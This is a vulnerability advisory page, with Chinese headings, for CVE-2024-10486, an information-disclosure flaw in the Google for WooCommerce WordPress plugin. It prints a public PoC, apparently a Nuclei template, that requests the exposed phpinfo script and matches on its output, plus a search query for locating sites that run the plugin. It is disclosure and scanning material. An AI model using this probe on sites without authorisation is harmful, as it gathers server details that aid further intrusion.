CVE-2024-10486: Google for WooCommerce <= 2.8.6 - Information Disclosure via Publicly Accessible PHP Info File

日期: 2025-08-01 | 影响软件: Google for WooCommerce | POC: 已公开

漏洞描述

The Google for WooCommerce plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 2.8.6. This is due to publicly accessible print_php_information.php file. This makes it possible for unauthenticated attackers to retrieve information about Webserver and PHP configuration, which can be used to aid other attacks.

PoC代码[已公开]

id: CVE-2024-10486

info:
  name: Google for WooCommerce <= 2.8.6 - Information Disclosure via Publicly Accessible PHP Info File
  author: popcorn94
  severity: medium
  description: |
    The Google for WooCommerce plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 2.8.6. This is due to publicly accessible print_php_information.php file. This makes it possible for unauthenticated attackers to retrieve information about Webserver and PHP configuration, which can be used to aid other attacks.
  reference:
    - https://plugins.trac.wordpress.org/browser/google-listings-and-ads/tags/2.8.6/vendor/googleads/google-ads-php/scripts/print_php_information.php
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/google-listings-and-ads/google-for-woocommerce-286-information-disclosure-via-publicly-accessible-php-info-file
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-10486
    cwe-id: CWE-862
    epss-score: 0.02166
    epss-percentile: 0.83812
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/google-listings-and-ads/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,google-listings-and-ads,info-leak,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/scripts/print_php_information.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bba810389df2eb09bcfc8c35b1c441c9d97a39f6eaf6367850daae96826052d302207206a8fb6a6610280517a16f76d95bb3be5246f12fe3ade9d3eb9447df158143:922c64590222798bb761d5b6d8e72950

相关漏洞推荐